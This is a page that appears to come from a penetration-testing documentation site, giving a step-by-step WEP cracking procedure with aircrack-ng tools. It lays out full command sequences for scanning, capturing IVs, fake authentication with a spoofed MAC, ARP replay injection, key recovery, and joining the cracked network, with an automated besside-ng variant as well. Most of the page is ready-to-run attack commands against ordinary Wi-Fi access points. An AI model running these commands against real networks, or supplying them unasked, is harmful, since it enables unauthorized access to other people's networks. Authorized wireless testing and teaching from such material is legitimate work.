Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

WEP (Wired Equivalent Privacy) is a broken encryption protocol. Its vulnerability lies in weak initialization vectors (IVs), by collecting enough IVs through ARP replay attacks, the key can be statistically recovered. This attack uses aircrack-ng suite: capture IVs with airodump-ng, generate traffic with aireplay-ng, and crack the key with aircrack-ng.

Automatic Attack (besside-ng)

besside-ng automates the entire WEP cracking process, fake auth, ARP replay, and cracking in one command: 
airmon-ng check kill
besside-ng -c <CHANNEL> -b <BSSID> wlan0 -v

Manual Attack

1. Find the WEP Network

Scan all bands to identify WEP targets (look for WEP in the ENC column): 
airodump-ng --band abg <WIFI-INTERFACE>

2. Focus on Target Network

Capture traffic and write to file: 
airodump-ng -w wep-capture --bssid <BSSID> --channel <CHANNEL> <WIFI-INTERFACE>

3. Fake Authentication

Associate with the AP using a spoofed MAC to allow packet injection: 
sudo aireplay-ng -1 0 -a <BSSID> -h F0:00:00:00:00:00 -e "NETWORK-NAME" <WIFI-INTERFACE>

4. ARP Replay Attack

Generate traffic to force the AP to produce new IVs: 
sudo aireplay-ng --arpreplay -b <BSSID> -h F0:00:00:00:00:00 <WIFI-INTERFACE>

5. Crack the Key

Run once enough IVs are captured (typically 50,000–200,000): 
sudo aircrack-ng -a 1 wep-capture-01.cap

WEP Connection

wpa_supplicant config: 
network={
    ssid="<ESSID>"
    key_mgmt=NONE
    wep_key0=<KEY>
    wep_tx_keyidx=0
}
Connect: 
sudo airmon-ng stop wlan0mon
sudo wpa_supplicant -i wlan0 -c /tmp/client.conf
Get an IP address: 
sudo dhclient wlan0 -v